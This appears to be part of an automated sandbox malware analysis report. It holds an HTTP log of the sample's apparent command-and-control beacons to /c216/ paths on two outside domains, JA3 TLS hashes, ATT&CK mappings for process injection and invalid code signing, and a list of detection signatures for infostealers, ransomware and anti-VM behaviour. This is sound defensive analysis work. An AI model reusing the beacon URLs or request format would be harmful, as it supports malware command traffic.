2020-06-05 14:10:20.841 192.168.1.6 [VT] 49204 23.227.38.64 [VT] 80 403 www.thetoptitle.com [VT] /c216/?lxldz=Nnqh7TNKIIDcqdzGNwugJZtqnGWTOdvJypW6t/M5WntLNAJT3RrvH7SpKhfW7prI&Tj=YBZ4 text/html None None 1794
2020-06-05 14:10:54.885 192.168.1.6 [VT] 49206 172.217.16.142 [VT] 80 302 redirector.gvt1.com [VT] /edgedl/release2/update2/AOVe98a3fi3oIA5CfTl3ibc_1.3.35.452/GoogleUpdateSetup.exe text/html Microsoft BITS/7.5 None 0
2020-06-05 14:10:56.641 192.168.1.6 [VT] 49207 144.208.213.45 [VT] 80 200 r2---sn-5oxmp55u-8pxe.gvt1.com [VT] /edgedl/release2/update2/AOVe98a3fi3oIA5CfTl3ibc_1.3.35.452/GoogleUpdateSetup.exe?cms_redirect=yes&mh=9Y&mip=185.220.100.242&mm=28&mn=sn-5oxmp55u-8pxe&ms=nvh&mt=1591366156&mv=m&mvi=1&pl=24&shardbypass=yes application/octet-stream Microsoft BITS/7.5 None 0
2020-06-05 14:11:06.012 192.168.1.6 [VT] 49209 72.21.91.29 [VT] 80 200 ocsp.digicert.com [VT] /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D application/ocsp-response Microsoft-CryptoAPI/6.1 None 1507
2020-06-05 14:11:35.711 192.168.1.6 [VT] 49207 144.208.213.45 [VT] 80 206 r2---sn-5oxmp55u-8pxe.gvt1.com [VT] /edgedl/release2/update2/AOVe98a3fi3oIA5CfTl3ibc_1.3.35.452/GoogleUpdateSetup.exe?cms_redirect=yes&mh=9Y&mip=185.220.100.242&mm=28&mn=sn-5oxmp55u-8pxe&ms=nvh&mt=1591366156&mv=m&mvi=1&pl=24&shardbypass=yes application/octet-stream Microsoft BITS/7.5 None 6388
2020-06-05 14:11:49.953 192.168.1.6 [VT] 49210 184.168.221.40 [VT] 80 None www.barsoum.dentist [VT] /c216/?lxldz=qDsuE3Dsv2OzkxyZUeXZwGu6bH8qaHXOomLR5n8tK0jzX5EyijM1plB0iZv+jWrr&Tj=YBZ4&sql=1 None None None 0
2020-06-05 14:11:51.962 192.168.1.6 [VT] 49211 184.168.221.40 [VT] 80 None www.barsoum.dentist [VT] /c216/ None Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko http://www.barsoum.dentist/c216/ 0
2020-06-05 14:12:18.372 192.168.1.6 [VT] 49207 144.208.213.45 [VT] 80 206 r2---sn-5oxmp55u-8pxe.gvt1.com [VT] /edgedl/release2/update2/AOVe98a3fi3oIA5CfTl3ibc_1.3.35.452/GoogleUpdateSetup.exe?cms_redirect=yes&mh=9Y&mip=185.220.100.242&mm=28&mn=sn-5oxmp55u-8pxe&ms=nvh&mt=1591366156&mv=m&mvi=1&pl=24&shardbypass=yes application/octet-stream Microsoft BITS/7.5 None 10303
2020-06-05 14:12:20.216 192.168.1.6 [VT] 49213 72.21.91.29 [VT] 80 200 ocsp.digicert.com [VT] /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D application/ocsp-response Microsoft-CryptoAPI/6.1 None 1507
2020-06-05 14:12:20.460 192.168.1.6 [VT] 49214 72.21.91.29 [VT] 80 200 crl3.digicert.com [VT] /Omniroot2025.crl application/x-pkcs7-crl Microsoft-CryptoAPI/6.1 None 5354
2020-06-05 14:12:25.061 192.168.1.6 [VT] 49207 144.208.213.45 [VT] 80 206 r2---sn-5oxmp55u-8pxe.gvt1.com [VT] /edgedl/release2/update2/AOVe98a3fi3oIA5CfTl3ibc_1.3.35.452/GoogleUpdateSetup.exe?cms_redirect=yes&mh=9Y&mip=185.220.100.242&mm=28&mn=sn-5oxmp55u-8pxe&ms=nvh&mt=1591366156&mv=m&mvi=1&pl=24&shardbypass=yes application/octet-stream Microsoft BITS/7.5 None 56824
Sorry! No dropped Suricata Extracted files.

JA3

Source Source Port Destination Destination Port JA3 Hash JA3 Description
192.168.1.6 49184 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.6 49185 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.6 49186 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.6 49187 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.6 49188 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.6 49205 172.217.23.99 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.6 49192 184.51.9.166 443 d124ae14809abde3528a479fe01a12bd unknown
192.168.1.6 49193 184.51.9.166 443 bafc6b01eae6f4350f5db6805ace208e unknown
192.168.1.6 49194 184.51.9.166 443 bafc6b01eae6f4350f5db6805ace208e unknown
192.168.1.6 49189 20.36.252.129 443 d124ae14809abde3528a479fe01a12bd unknown
192.168.1.6 49203 20.36.252.129 443 bafc6b01eae6f4350f5db6805ace208e unknown
192.168.1.6 49212 52.114.128.43 443 d124ae14809abde3528a479fe01a12bd unknown
192.168.1.6 49208 52.114.132.20 443 d124ae14809abde3528a479fe01a12bd unknown
Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.
JSON Report Download
Defense Evasion Privilege Escalation
  • T1116 - Code Signing
    • Signature - invalid_authenticode_signature
  • T1055 - Process Injection
    • Signature - InjectionInterProcess
  • T1055 - Process Injection
    • Signature - InjectionInterProcess

    Processing ( 29.694000000000003 seconds )

    • 23.421 NetworkAnalysis
    • 5.235 Suricata
    • 0.534 CAPE
    • 0.193 VirusTotal
    • 0.127 BehaviorAnalysis
    • 0.1 Static
    • 0.029 Deduplicate
    • 0.025 AnalysisInfo
    • 0.013 TargetInfo
    • 0.006 peid
    • 0.004 Debug
    • 0.004 Dropped
    • 0.002 Strings
    • 0.001 ProcDump

    Signatures ( 0.21400000000000008 seconds )

    • 0.046 antiav_detectreg
    • 0.018 infostealer_ftp
    • 0.017 territorial_disputes_sigs
    • 0.012 ransomware_files
    • 0.01 infostealer_im
    • 0.009 antianalysis_detectreg
    • 0.007 ransomware_extensions
    • 0.006 antiav_detectfile
    • 0.005 antidbg_windows
    • 0.005 antivm_vbox_keys
    • 0.005 network_cnc_http
    • 0.004 persistence_autorun
    • 0.004 antianalysis_detectfile
    • 0.004 modify_proxy
    • 0.004 infostealer_bitcoin
    • 0.004 infostealer_mail
    • 0.003 api_spamming
    • 0.003 decoy_document
    • 0.003 antivm_vmware_keys
    • 0.003 masquerade_process_name
    • 0.003 network_torgateway
    • 0.002 kibex_behavior
    • 0.002 NewtWire Behavior
    • 0.002 antivm_parallels_keys
    • 0.002 antivm_vbox_files
    • 0.002 antivm_xen_keys
    • 0.002 geodo_banking_trojan
    • 0.002 browser_security
    • 0.002 disables_browser_warn
    • 0.002 network_dns_opennic
    • 0.002 recon_checkip
    • 0.001 InjectionCreateRemoteThread
    • 0.001 antiemu_wine_func
    • 0.001 antivm_generic_disk
    • 0.001 antivm_vbox_libs
    • 0.001 betabot_behavior
    • 0.001 dynamic_function_loading
    • 0.001 exec_crash
    • 0.001 malicious_dynamic_function_loading
    • 0.001 mimics_filetime
    • 0.001 stealth_timeout
    • 0.001 tinba_behavior
    • 0.001 antidbg_devices
    • 0.001 antivm_generic_diskreg
    • 0.001 antivm_vpc_keys
    • 0.001 ketrican_regkeys
    • 0.001 network_http
    • 0.001 revil_mutexes
    • 0.001 limerat_regkeys
    • 0.001 recon_fingerprint

    Reporting ( 240.99 seconds )

    • 234.049 PCAP2CERT
    • 6.893 BinGraph
    • 0.048 MITRE_TTPS